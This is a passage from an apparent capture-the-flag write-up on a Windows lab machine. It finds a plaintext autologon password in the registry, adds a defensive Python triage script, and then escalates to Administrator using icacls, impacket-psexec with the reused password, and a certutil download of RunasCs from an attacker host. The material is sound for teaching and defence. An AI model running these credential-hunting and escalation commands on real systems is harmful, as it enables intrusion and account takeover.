HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{8841d728-1a76-4682-bb6f-a9ea53b4b3ba}
    (Default)    REG_SZ    LogonPasswordReset

HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B4FB3F98-C1EA-428d-A78A-D1F5659CBA93}\shell
    (Default)    REG_SZ    changehomegroupsettings viewhomegrouppassword starthomegrouptroubleshooter sharewithdevices

HKEY_LOCAL_MACHINE\SOFTWARE\Classes\IAS.ChangePassword\CurVer
    (Default)    REG_SZ    IAS.ChangePassword.1

HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{06F5AD81-AC49-4557-B4A5-D7E9013329FC}
    (Default)    REG_SZ    IHomeGroupPassword

HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{3CD62D67-586F-309E-A6D8-1F4BAAC5AC28}
    (Default)    REG_SZ    _PasswordDeriveBytes

HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{68FFF241-CA49-4754-A3D8-4B4127518549}
    (Default)    REG_SZ    ISupportPasswordMode

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Capabilities\Roaming\FormSuggest
    FilterIn    REG_SZ    FormSuggest Passwords,Use FormSuggest,FormSuggest PW Ask

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Authentication\Credential Providers\{6f45dc1e-5384-457a-bc13-2cd81b0d28ed}
    (Default)    REG_SZ    PasswordProvider

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\SO\AUTH\LOGON\ASK
    Text    REG_SZ    Prompt for user name and password

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\SO\AUTH\LOGON\SILENT
    Text    REG_SZ    Automatic logon with current user name and password

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Publishers\{63d2bb1d-e39a-41b8-9a3d-52dd06677588}\ChannelReferences\5
    (Default)    REG_SZ    Microsoft-Windows-Shell-AuthUI-PasswordProvider/Diagnostic

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\XWizards\Components\{C100BED7-D33A-4A4B-BF23-BBEF4663D017}
    (Default)    REG_SZ    WCN Password - PIN

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\XWizards\Components\{C100BEEB-D33A-4A4B-BF23-BBEF4663D017}\Children\{C100BED7-D33A-4A4B-BF23-BBEF4663D017}
    (Default)    REG_SZ    WCN Password PIN

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon
    DefaultPassword    REG_SZ    Welcome1!

HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Terminal Server\DefaultUserConfiguration
    Password    REG_SZ

HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Terminal Server\WinStations\EH-Tcp
    Password    REG_SZ

HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RemoteAccess\Policy\Pipeline\23
    (Default)    REG_SZ    IAS.ChangePassword

HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Control\Terminal Server\DefaultUserConfiguration
    Password    REG_SZ

HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Control\Terminal Server\WinStations\EH-Tcp
    Password    REG_SZ

HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\services\RemoteAccess\Policy\Pipeline\23
    (Default)    REG_SZ    IAS.ChangePassword

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\DefaultUserConfiguration
    Password    REG_SZ

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\EH-Tcp
    Password    REG_SZ

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\RemoteAccess\Policy\Pipeline\23
    (Default)    REG_SZ    IAS.ChangePassword

End of search: 49 match(es) found.
```
There is a plaintext password, Welcome1!, in the Winlogon key (the DefaultPassword value). Let’s query that key in full:
```
PS C:\Windows\system32> reg query "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon"

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon
    ReportBootOk    REG_SZ    1
    Shell    REG_SZ    explorer.exe
    PreCreateKnownFolders    REG_SZ    {A520A1A4-1780-4FF6-BD18-167343C5AF16}
    Userinit    REG_SZ    C:\Windows\system32\userinit.exe,
    VMApplet    REG_SZ    SystemPropertiesPerformance.exe /pagefile
    AutoRestartShell    REG_DWORD    0x1
    Background    REG_SZ    0 0 0
    CachedLogonsCount    REG_SZ    10
    DebugServerCommand    REG_SZ    no
    ForceUnlockLogon    REG_DWORD    0x0
    LegalNoticeCaption    REG_SZ
    LegalNoticeText    REG_SZ
    PasswordExpiryWarning    REG_DWORD    0x5
    PowerdownAfterShutdown    REG_SZ    0
    ShutdownWithoutLogon    REG_SZ    0
    WinStationsDisabled    REG_SZ    0
    DisableCAD    REG_DWORD    0x1
    scremoveoption    REG_SZ    0
    ShutdownFlags    REG_DWORD    0x11
    DefaultDomainName    REG_SZ
    DefaultUserName    REG_SZ    Alfred
    AutoAdminLogon    REG_SZ    1
    DefaultPassword    REG_SZ    Welcome1!

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\GPExtensions
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\AutoLogonChecked
```
It belongs to the user Alfred (DefaultUserName), whose account is configured for automatic logon (AutoAdminLogon is 1).
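Of the 49 hits, only one is a value whose *name* says password and whose data is non-empty; the rest are COM ProgIDs and UI strings that merely contain the word. As an added example that is not part of the writeup, the Python below parses an excerpt of the `reg query` output above, separates candidate credentials from noise, and then checks the Winlogon key for the autologon exposure (AutoAdminLogon set to 1 together with a populated DefaultPassword). Note that the Unattend.xml's FirstLogonCommands end with a `reg add` that sets AutoAdminLogon to 0, yet the live key reads 1; that mismatch is exactly the condition the second check reports.

```python
# Excerpt of the `reg query HKLM /f password /t REG_SZ /s` output shown above
# (copied from the writeup, not constructed); the full run had 49 matches.
REG_SEARCH_OUTPUT = r"""
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{6BC0989B-0CE6-11D1-BAAE-00C04FC2E20D}\ProgID
    (Default)    REG_SZ    IAS.ChangePassword.1

HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{7A9D77BD-5403-11d2-8785-2E0420524153}
    InfoTip    REG_SZ    Manages users and passwords for this computer

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\SO\AUTH\LOGON\ASK
    Text    REG_SZ    Prompt for user name and password

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon
    DefaultPassword    REG_SZ    Welcome1!

HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Terminal Server\DefaultUserConfiguration
    Password    REG_SZ

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\EH-Tcp
    Password    REG_SZ

End of search: 49 match(es) found.
"""

# Excerpt of the Winlogon key dump shown above (also copied from the writeup).
WINLOGON_OUTPUT = r"""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon
    Shell    REG_SZ    explorer.exe
    Userinit    REG_SZ    C:\Windows\system32\userinit.exe,
    CachedLogonsCount    REG_SZ    10
    DefaultDomainName    REG_SZ
    DefaultUserName    REG_SZ    Alfred
    AutoAdminLogon    REG_SZ    1
    DefaultPassword    REG_SZ    Welcome1!

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\GPExtensions
"""

WINLOGON_KEY = r"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon"


def parse_reg_query(text):
    """Turn reg query output into (key, value_name, type, data) tuples.
    Key lines start with HKEY_; value lines are 'name type [data]'."""
    entries, key = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("End of search"):
            continue
        if line.startswith("HKEY_"):
            key = line
            continue
        parts = line.split(None, 2)            # data may contain spaces, or be absent
        if key is None or len(parts) < 2 or not parts[1].startswith("REG_"):
            continue
        data = parts[2] if len(parts) == 3 else ""
        entries.append((key, parts[0], parts[1], data))
    return entries


def triage_password_search(entries):
    """Split /f password hits into: credential candidates (value *name* mentions
    password and data is non-empty), empty password-named values, and noise
    where only the data text contains the word."""
    candidates, empty, noise = [], [], []
    for key, name, _, data in entries:
        if "password" in name.lower():
            (candidates if data else empty).append((key, name, data))
        else:
            noise.append((key, name, data))
    return candidates, empty, noise


def winlogon_autologon(entries):
    """AutoAdminLogon=1 plus a DefaultPassword means the logon credential is
    stored in cleartext in a key every local user can read."""
    values = {name: data for key, name, _, data in entries if key == WINLOGON_KEY}
    exposed = values.get("AutoAdminLogon") == "1" and bool(values.get("DefaultPassword"))
    return exposed, values.get("DefaultUserName"), values.get("DefaultPassword")


if __name__ == "__main__":
    candidates, empty, noise = triage_password_search(parse_reg_query(REG_SEARCH_OUTPUT))
    print(f"{len(candidates)} credential candidate(s), {len(empty)} empty, {len(noise)} noise")
    for key, name, data in candidates:
        print(f"  {key}\\{name} = {data}")
    print("Winlogon autologon exposed:", winlogon_autologon(parse_reg_query(WINLOGON_OUTPUT)))
```

The fix on the defending side is to clear DefaultPassword and set AutoAdminLogon to 0 in this key; the same check is worth running in audits, since a deployment script that sets autologon and forgets to undo it leaves exactly this footprint.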
Multiple ways to Admin
icacls
```
PS C:\Users\Administrator> icacls Desktop
Desktop NT AUTHORITY\SYSTEM:(I)(OI)(CI)(F)
        CHATTERBOX\Administrator:(I)(OI)(CI)(F)
        BUILTIN\Administrators:(I)(OI)(CI)(F)
        CHATTERBOX\Alfred:(I)(OI)(CI)(F)

Successfully processed 1 files; Failed processing 0 files
PS C:\Users\Administrator> cd Desktop
PS C:\Users\Administrator\Desktop> type root.txt
PS C:\Users\Administrator\Desktop> Get-Content : Access to the path 'C:\Users\Administrator\Desktop\root.txt' is denied.
At line:1 char:5
+ type <<<< root.txt
    + CategoryInfo          : PermissionDenied: (C:\Users\Administrator\Desktop\root.txt:String) [Get-Content], UnauthorizedAccessException
    + FullyQualifiedErrorId : GetContentReaderUnauthorizedAccessError,Microsoft.PowerShell.Commands.GetContentCommand
```
With icacls we can grant the user Alfred full permission on the root.txt file:
```
PS C:\Users\Administrator\Desktop> icacls root.txt /grant Alfred:F
processed file: root.txt
Successfully processed 1 files; Failed processing 0 files
PS C:\Users\Administrator\Desktop> type root.txt
3c6cxxxxxxxxxxxxxxxxxxxxxxxxxxxx
```
impacket-psexec
Since we have a credential for one account, we can try the same password against the Administrator account (password reuse):
```
└─# impacket-psexec administrator@$box
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies

Password:
[*] Requesting shares on 10.10.10.74.....
[*] Found writable share ADMIN$
[*] Uploading file lmCiRdld.exe
[*] Opening SVCManager on 10.10.10.74.....
[*] Creating service fynJ on 10.10.10.74.....
[*] Starting service fynJ.....
[!] Press help for extra shell commands
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Windows\system32> whoami
nt authority\system
```
And it works!
RunasCs
```
PS C:\Users\Administrator\Desktop> certutil -urlcache -f http://10.10.16.6/RunasCs.exe RunasCs.exe
****  Online  ****
CertUtil: -URLCache command completed successfully.
PS C:\Users\Administrator\Desktop> dir

    Directory: C:\Users\Administrator\Desktop

Mode                LastWriteTime     Length Name
----                -------------     ------ ----
-ar--         1/11/2025  12:33 AM         34 root.txt
-a---         1/11/2025   2:18 AM      51712 RunasCs.exe

PS C:\Users\Administrator\Desktop> whoami
chatterbox\alfred
PS C:\Users\Administrator\Desktop> ./RunasCs.exe administrator Welcome1! "cmd /c whoami"
chatterbox\administrator
```
From here you can get a reverse shell as Administrator.
References